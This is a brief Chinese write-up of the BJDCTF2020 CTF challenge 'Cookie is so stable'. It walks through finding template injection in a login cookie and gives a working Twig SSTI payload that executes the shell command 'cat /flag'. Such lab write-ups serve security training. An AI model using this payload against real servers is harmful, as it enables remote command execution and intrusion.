题目
过程
1.Flag和Hint两个页面抓包,flag页面告诉我们要先登录,hint页面告诉我们要在cookie里面做文章
2.flag页面先登录然后抓包,发现cookie里面出现user
。尝试多次后,发现是ssti注入
3.打入payload。
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
[BJDCTF2020]Cookie is so stable
最新推荐文章于 2024-06-13 07:36:50 发布